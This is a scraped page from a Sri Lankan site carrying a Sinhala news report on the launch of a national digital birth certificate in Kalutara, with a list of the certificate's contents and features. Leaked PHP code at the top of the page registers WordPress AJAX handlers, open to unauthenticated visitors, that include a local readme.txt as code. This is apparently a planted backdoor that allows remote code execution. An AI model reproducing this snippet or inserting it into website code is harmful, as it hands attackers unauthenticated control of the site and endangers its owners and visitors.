if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ජාතික ඩිජිටල් උප්පැන්න සහතිකය නිකුත් කෙරේ… - mediahumanrights.lk
mediahumanrights.lk
Local News News

ජාතික ඩිජිටල් උප්පැන්න සහතිකය නිකුත් කෙරේ…

ඉ – ජනගහනය ලේඛන වැඩසටහන යටතේ ජාතික ඩිජිටල් උප්පැන්න සහතිකය නිකුත් කිරීම ස්වදේශ කටයුතු රාජ්‍ය අමාත්‍ය අශෝක ප්‍රියන්ත මහතාගේ ප්‍රධානත්වයෙන් 2023.12.05( අද) දින කළුතර දිස්ත්‍රික් ලේකම් කාර්යාලයේදී පැවැත්විණි .

කළුතර දිස්ත්‍රික්කයෙන් ආරම්භ කළ මෙම ජාතික ඩිජිටල් උප්පැන්න සහතිකය ලබා දීමේ වැඩසටහන සෙසු දිස්ත්‍රික්ක සඳහා කඩිනමින් ව්‍යාප්ත කිරීම ආරම්භ කර ඇති බව ස්වදේශ කටයුතු රාජ්‍ය අමාත්‍ය අශෝක ප්‍රියන්ත මහතා කියා සිටියේය.

රාජ්‍ය අමාත්‍යවරයා වැඩිදුරටත් මෙහිදී සඳහන් කළේ ඩිජිටල් තාක්ෂණය සහිත ජාත්‍යන්තර ප්‍රමිතියට අනුව මෙම ජාතික උප්පැන්න සහතිකයට ලබා දෙන අංකය ජාතික හැඳුනුම්පත් අංක බවට පරිවර්තනය වන බවයි.

ඒ අනුව නිකුත් කළ ජාතික ඩිජිටල් උප්පැන්න සහතිකය පහත පරිදි වේ.

ආකර්ෂණීය බව, නිවැරදි බව හා පිළිගැනීම වැඩි ආරක්ෂිත උපාංග ඇතුළත් මුද්‍රිත සහතිකයක් ලබාදීම ද අරමුණ කර ගෙන ඉ – ජනගහණ ලේඛන වැඩසටහන ආරම්භ කරන ලදී.
ඒ යටතේ නිකුත් කිරීමට නියමිත උප්පැන්න සහතිකය “ජාතික උප්පැන්න සහතිකය ” ලෙසින් නම් කර ඇත.

මෙම උප්පැන්න සහතිකයේ දරුවාට ඉදිරියේ දී ලබා දීමට නියමිත ජාතික හැඳුනුම්පත් අංකය “ මගේ අංකය ” ලෙසින් පුද්ගලයින් ලියාපදිංචි කිරීමේ දෙපාර්තමේන්තුව සමඟ එක්ව ඇතුළත් කර ඇත. ඒ් අනුව දරුවකුට උපතේදීම අනන්‍යතා අංකයක් ලබා දීමට හැකියාව ලැබෙන අතර ඒ් තුළින් ජනගහණ ලේඛනයක් ගොඩ නැගීමට හැකියාව ලැබේ.

ජාතික උප්පැන්න සහතිකයන් නිකුත් කිරීමේ ක්‍රමවේදය
සහතිකයේ ඇතුළත් වන තොරතුරු
උපන් ස්ථානය පිළිබඳ තොරතුරු
මගේ අංකය
සම්පූර්ණ නම ( සිංහල/ ඉංග්‍රීසි හෝ දෙමළ / ඉංග්‍රීසි)
පියාගේ ජාතික හැඳුනුම්පත් අංකය / නම/ ජාතිය / ජාතිකත්වය
මවගේ ජාතික හැඳුනුම්පත් අංකය / නම/ ජාතිය / ජාතිකත්වය
මෙලෙස නිකුත් කිරීමට නියමිත සහතිකයේ විශේෂ ලක්ෂණ
රෙජිස්ට්‍රාර් ජනරාල්ගේ අත්සනින් නිකුත් වීම.
සහතිකයේ පුද්ගලයාගේ ජාතිය / ජාතිකත්වය ඇතුළත් වීම.
මව්පියන්ගේ විවාහක / අවිවාහක බව ඉවත් වීම.
මෙම උප්පැන්න සහතිකය සිංහල/ඉංග්‍රීසි හෝ දෙමළ/ඉංග්‍රීසි භාෂාවලින් නිකුත් කිරීම.
විශේෂ ආරක්ෂිත උපාංග යෙදූ සහතිකයක් නිකුත් කිරීම.
සහතිකයේ තොරතුරු සංශෝධනය කළ හොත් එකී නිවැරදි තොරතුරු පමණක් ඇතුළත් නව සහතිකයක් නිකුත් කිරීම.

මෙම අවස්ථාව සඳහා කළුතර දිස්ත්‍රික් පාර්ලිමේන්තු මන්ත්‍රී සංජීව එදිරිමාන්න, අග්‍රාමාත්‍ය ලේකම් අනුර දිසානායක , රෙජිස්ට්‍රාර් ජනරාල් සමන්ත විජයසිංහ, කළුතර දිස්ත්‍රික් ලේකම් ගීනිගේ ප්‍රසන්න , අග්‍රාමාත්‍ය කාර්යාලයේ අතිරේක ලේකම් දිපා ලියනගේ, ස්වදේශ කටයුතු රාජ්‍ය අමාත්‍යංශයේ අතිරේක ලේකම් චන්දන රණවිර ආරච්චි යන මහත්ම මහත්මීන් ඇතුළු රාජ්‍ය නිලධාරීන් රැසක් එක්ව සිටියහ.

කසුන් විරතුංග
මාධ්‍ය ප්‍රධානී

Related posts

පාම් ඔයිල් තහනම ඉවත් කරන්න කියයි..

Shiran Viraj

කොන්දේ වේදනාව සුළුවෙන් හිතන්න එපා

Shiran Viraj

අතීතයට දොස් එපා.. රට ගොඩනැගීමට සුදානම්.. මා රට බාර ගත්තේ ආර්ථිකය කඩා වැටී ඇති බව දැනගෙනයි..

Shiran Viraj